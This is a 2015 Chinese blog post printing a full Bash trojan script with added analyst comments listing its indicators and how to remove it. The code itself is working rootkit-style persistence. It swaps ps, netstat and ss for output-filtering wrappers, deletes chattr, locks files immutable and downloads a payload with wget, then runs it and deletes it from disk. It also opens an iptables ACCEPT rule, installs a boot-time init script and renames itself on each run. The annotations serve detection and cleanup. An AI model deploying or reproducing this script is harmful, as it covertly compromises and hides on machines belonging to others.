
分类: 系统运维

2015-09-15 11:04:56

#! /bin/bash
#chkconfig:12345 90 90
#############################################
#############################################
#############################################
#############################################
#############################################
# Analyst annotations: comments only, every command below is unchanged.
# This is the persistence and concealment script of a Linux trojan (the post's
# author describes it as the trojan's core script). In order, it:
#   1. keeps a state file that records the script's current file name;
#   2. resolves an address and rewrites resolv.conf if nothing resolves;
#   3. copies chattr to /usr/bin/zfgsr and deletes the original chattr;
#   4. replaces ss, netstat and ps with shell wrappers that filter output;
#   5. restarts the binary payload and re-downloads it if it is missing;
#   6. re-adds firewall / hosts.allow access for the resolved address;
#   7. writes a SysV init script, copies itself to a new random name,
#      starts that copy and deletes the old one.
# File-system indicators that appear literally in this script:
#   /usr/bin/zfgsr, /usr/bin/.zfgsr, /usr/bin/.Fss, /usr/bin/.Fps,
#   /usr/bin/.Fnetstat, /usr/bin/dpkgd/, /etc/init.d/.dbus-daemon--system,
#   /usr/bin/.dbus-daemon--system(.bak), /etc/allow.bak, /sbin/Fconfig.n,
#   /etc/rc.d/init.d/S99.25000, and a missing /usr/bin/chattr.
# Remediation note: most of these files are given the immutable and
# append-only attributes (+ia), so the attributes have to be cleared (lsattr
# shows them) before the files can be removed; the renamed chattr copy at
# /usr/bin/zfgsr or a reinstalled chattr can do that.

# `path` and `exit0` are assigned here but not referenced again in this script.
path=`pwd`
exit0="exit 0"
# Hidden copies of the genuine ss / ps / netstat binaries.
Fss="/usr/bin/.Fss"
Fps="/usr/bin/.Fps"
Fnet="/usr/bin/.Fnetstat"
# Renamed copy of chattr (created further down).
LockAngel="/usr/bin/zfgsr"
# Second set of copies of the genuine binaries.
Fssbak="/usr/bin/dpkgd/ss"
Fpsbak="/usr/bin/dpkgd/ps"
Fnetbak="/usr/bin/dpkgd/netstat"
# Binary payload and its spare copy.
MyFileAngel="/etc/init.d/.dbus-daemon--system"
PuppetAngel="/usr/bin/.dbus-daemon--system.bak"
# Snapshot of /etc/hosts.allow, state file, and boot-time init script.
allow="/etc/allow.bak"
Fconfig="/sbin/Fconfig.n"
S99="/etc/rc.d/init.d/S99.25000"
# First run: create the state file. Its second field is read back below as the
# name of the currently installed script copy. The file is then locked with +ia.
if [ ! -f  "$Fconfig" ];then
echo byqinshou 995999349 > $Fconfig
zfgsr +ia $Fconfig >/dev/null 2>&1
fi


# Address1 = field 2 of every "Address: " line that nslookup prints.
# NOTE(review): nslookup has no host argument here; the name was presumably
# removed from this published copy (the wget URL below also lacks a host).
Address1=`nslookup |grep "Address: "|awk '{print $2}'`
# Nothing resolved: unlock resolv.conf, overwrite it with two public resolvers,
# set its mtime back to 2010 and lock it again. A resolv.conf that carries +ia
# and an old timestamp is therefore a sign of this script.
if [ -z "$Address1" ];then
zfgsr -ia /etc/resolv.conf
echo 'nameserver 114.114.114.114'>/etc/resolv.conf
echo 'nameserver 8.8.8.8'>>/etc/resolv.conf
touch -d "2010-06-7 08:10:30"  /etc/resolv.conf
zfgsr +ia /etc/resolv.conf
fi


Ftempbash=`cat $Fconfig | awk '{print $2}'`   #current script file name
Fbashtemp="/usr/bin/"$Ftempbash #current script path
# New name: first 10 hex characters of the md5 of the nanosecond timestamp,
# so the script's file name under /usr/bin changes on every run.
Fbashname=`date +%s%N | md5sum | head -c 10`
Fbashpath="/usr/bin/"$Fbashname #new script path


# Started from a path other than the recorded one: kill the recorded copy and
# delete both it and the spare payload.
if [ $0 != "$Fbashtemp" ];then
pkill $Ftempbash;killall $Ftempbash
zfgsr -ia /usr/bin/$Ftempbash;rm -f /usr/bin/$Ftempbash
zfgsr -ia $PuppetAngel;rm -f $PuppetAngel
fi


# -------------------------------------------------------------
# No /usr/bin/zfgsr yet: copy chattr to zfgsr and .zfgsr, make both
# world-writable, backdate them to 2011 and delete /usr/bin/chattr.
# The last command calls `zfgs`, a name that no line of this script creates;
# its output is discarded, so check with lsattr whether the lock was applied.
if [ ! -f  "$LockAngel" ];then
zfgsr -ia $LockAngel
rm -rf $LockAngel
cp -f /usr/bin/chattr $LockAngel
cp -f /usr/bin/chattr /usr/bin/.zfgsr
cp -f /usr/bin/.zfgsr $LockAngel
chmod 777 $LockAngel
chmod 777 /usr/bin/.zfgsr
touch -d "2011-06-7 08:10:30"  $LockAngel
touch -d "2011-06-7 08:10:30"  /usr/bin/.zfgsr
rm -rf /usr/bin/chattr
zfgs +ia $LockAngel >/dev/null 2>&1
fi


# ss: keep the genuine binary as .Fss (and in dpkgd/), then replace
# /usr/sbin/ss with a three-line sh script that runs .Fss and drops every line
# containing $Address1. Detection: /usr/sbin/ss is a shell script instead of
# an ELF binary and fails package verification (rpm -V, dpkg --verify).
if [ -f /usr/sbin/ss ];then
if [ ! -f "$Fss" ];then
if [ ! -f "$Fssbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /usr/sbin/ss $Fssbak
cp -f /usr/sbin/ss $Fss
else
cp -f $Fssbak $Fss
fi
zfgsr -ia /usr/sbin/ss
rm -rf /usr/sbin/ss
echo '#!/bin/sh' > /usr/sbin/ss
echo '.Fss|grep -v "'$Address1'"' >> /usr/sbin/ss
echo 'exit' >> /usr/sbin/ss
chmod 0755 $Fss;chmod 0755 /usr/sbin/ss
zfgsr +ia /usr/sbin/ss >/dev/null 2>&1
zfgsr +ia $Fssbak >/dev/null 2>&1
zfgsr +ia $Fss >/dev/null 2>&1
fi
fi


# netstat: same replacement; the wrapper passes its arguments to .Fnetstat and
# filters out lines containing $Address1.
if [ -f /bin/netstat ];then
if [ ! -f "$Fnet" ];then
if [ ! -f "$Fnetbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /bin/netstat $Fnetbak
cp -f /bin/netstat $Fnet
else
cp -f $Fnetbak $Fnet
fi
zfgsr -ia /bin/netstat
rm -rf /bin/netstat
echo '#!/bin/sh' > /bin/netstat
echo 'for arg in "$*";do' >> /bin/netstat
echo '.Fnetstat $arg|grep -v "'$Address1'";done;exit' >> /bin/netstat
chmod 0755 $Fnet;chmod 0755 /bin/netstat
zfgsr +ia /bin/netstat >/dev/null 2>&1
zfgsr +ia $Fnetbak >/dev/null 2>&1
zfgsr +ia $Fnet >/dev/null 2>&1
fi
fi


# ps: same replacement; the wrapper hides lines containing
# ".dbus-daemon--system", the new random script name, "ps" or "grep".
# Because "ps" and "grep" are matched as plain substrings, unrelated processes
# with those letters in their command line also vanish from ps output, which
# is a visible symptom on an affected host.
if [ -f /bin/ps ];then
if [ ! -f "$Fps" ];then
if [ ! -f "$Fpsbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /bin/ps $Fpsbak
cp -f /bin/ps $Fps
else
cp -f $Fpsbak $Fps
fi
zfgsr -ia /bin/ps
rm -rf /bin/ps
echo '#!/bin/sh' > /bin/ps;echo 'for arg in "$*";do' >> /bin/ps
echo '.Fps $arg|grep -v "'.dbus-daemon--system'"|grep -v "'$Fbashname'"|grep -v "ps"|grep -v "grep";done;exit' >> /bin/ps
chmod 0755 $Fps;chmod 0755 /bin/ps
zfgsr +ia /bin/ps >/dev/null 2>&1
zfgsr +ia $Fpsbak >/dev/null 2>&1
zfgsr +ia $Fps >/dev/null 2>&1
fi
fi


# First run: snapshot /etc/hosts.allow; the snapshot is copied back near the
# end of every run.
if [ ! -f  "$allow" ];then
cp -f /etc/hosts.allow $allow
zfgsr +ia $allow >/dev/null 2>&1
fi
# by qinshou -----------------------------------------------
# Count payload processes with the genuine ps (.Fps). Unless exactly one is
# running, restore the payload from its .bak copy, start it and delete the
# file on disk, so the process keeps running from a deleted executable
# (/proc/<pid>/exe then reads "... (deleted)").
ExistAngel=`.Fps aux | grep .dbus-daemon--system | grep -v "grep" |wc -l`
if [ $ExistAngel != 1 ];then
zfgsr -ia /usr/bin/.dbus-daemon--system
rm -rf /usr/bin/.dbus-daemon--system
cp -f /usr/bin/.dbus-daemon--system.bak /usr/bin/.dbus-daemon--system
chmod 777 /usr/bin/.dbus-daemon--system
/usr/bin/.dbus-daemon--system
  rm -rf /usr/bin/.dbus-daemon--system
fi


# Payload missing from /etc/init.d: unlock wget, download 1000.exe into /etc/,
# move it to $MyFileAngel and lock it, then set wget to mode 0 and lock that
# too. A wget that suddenly has no permissions is a symptom of this block.
# NOTE(review): the URL has no host part (only port 999 and the file name);
# the host was presumably removed from this published copy.
# Every attribute change in this block goes through `zfgs` (see the note on
# that name in the chattr block above).
if [ ! -f  "$MyFileAngel" ];then
  zfgs -i /usr/bin/wget
  zfgs -a /usr/bin/wget
chmod 777 /usr/bin/wget
wget -P /etc/ http://:999/1000.exe
zfgs -i $MyFileAngel
zfgs -a $MyFileAngel
rm -rf $MyFileAngel
chmod 777 /etc/1000.exe
mv -f /etc/1000.exe $MyFileAngel
zfgs +i $MyFileAngel
zfgs +a $MyFileAngel
chmod 0 /usr/bin/wget
zfgs +i /usr/bin/wget
zfgs +a /usr/bin/wget
fi


# Keep a spare copy of the payload under /usr/bin.
if [ ! -f  "$PuppetAngel" ];then
cp -f $MyFileAngel $PuppetAngel
zfgs +i $PuppetAngel
zfgs +a $PuppetAngel
fi


# Firewall: if no INPUT rule mentions $Address1, insert an ACCEPT rule for it
# at the top of the chain; otherwise delete a DROP rule for it. A block added
# by an administrator is therefore removed on the next run.
iptable=`iptables -L INPUT|grep $Address1|awk '{print $1 $4}'`
if [ -z "$iptable" ];then
iptables -I INPUT -s $Address1 -j ACCEPT
else
iptables -D INPUT -s $Address1 -j DROP
fi
# autostart ------------------
# Boot persistence: write a SysV init script (runlevels 1-5) whose "start"
# branch and default branch both run the new script copy.
if [ ! -f  "$S99" ];then
echo "#!/bin/sh" >> $S99
echo "# chkconfig: 12345 90 90" >> $S99
echo "# description: $Ftempbash" >> $S99
echo "### BEGIN INIT INFO" >> $S99
echo "# Provides: $Ftempbash" >> $S99
echo "# Required-Start: " >> $S99
echo "# Required-Stop: " >> $S99
echo "# Default-Start: 1 2 3 4 5" >> $S99
echo "# Default-Stop: " >> $S99
echo "# Short-Description: $Ftempbash" >> $S99
echo "### END INIT INFO" >> $S99
echo 'case $1 in' >> $S99
echo "start)" >> $S99
echo " $Fbashpath" >> $S99
echo " ;;" >> $S99
echo "stop)" >> $S99
echo " ;;" >> $S99
echo "*)" >> $S99
echo " $Fbashpath" >> $S99
echo " ;;" >> $S99
echo "esac" >> $S99
fi
# by qinshou -----------------------------------------------
# Rotate the name: record the new name in the state file, copy this script to
# the new path and delete the file it was started from.
zfgsr -ia $Fconfig;zfgsr -ia $0;zfgsr -ia $Fbashpath
sed -i "s|$Ftempbash|$Fbashname|" $Fconfig
zfgsr +ia $Fconfig >/dev/null 2>&1
cp -f $0 $Fbashpath;rm -f $0;chmod 0755 $Fbashpath
# by qinshou -----------------------------------------------
# The backticks execute $S99 (they do not read it) and grep its output for the
# old path; if nothing matches, the old name inside the init script is
# replaced with the new one and the file is made world-writable.
if [ -z "`$S99|grep "$Fbashtemp"`" ]; then
sed -i "s|$Ftempbash|$Fbashname|" $S99
chmod 777 $S99
fi
# by qinshou -----------------------------------------------
# Delete chattr again (covers a reinstall), copy the hosts.allow snapshot back
# over the live file and lock it, then start the new copy in the background.
# Each run therefore hands over to a freshly named copy of itself.
zfgsr -ia /usr/bin/chattr;rm -f /usr/bin/chattr
zfgsr -ia /etc/hosts.allow;cp -f $allow /etc/hosts.allow;zfgsr +ia /etc/hosts.allow >/dev/null 2>&1
sleep 1;zfgsr -ia $Fbashpath;chmod 0755 $Fbashpath;nohup $Fbashpath >/dev/null 2>&1 &
# by qinshou -----------------------------------------------
# Update the ps wrapper so that it hides the new script name, then lock the ps
# and netstat wrappers again.
zfgsr -ia /bin/ps;sed -i "s|$Ftempbash|$Fbashname|" /bin/ps
zfgsr -ia /bin/netstat;chmod 0755 /bin/netstat;chmod 0755 /bin/ps
zfgsr +ia /bin/netstat >/dev/null 2>&1
zfgsr +ia /bin/ps >/dev/null 2>&1
# by qinshou -----------------------------------------------
exit

minminmsn2015-10-09 17:01:54

wuwei1055:你这是在干吗的脚本呢?

一个木马的核心脚本。


wuwei10552015-10-08 17:44:48

你这是在干吗的脚本呢?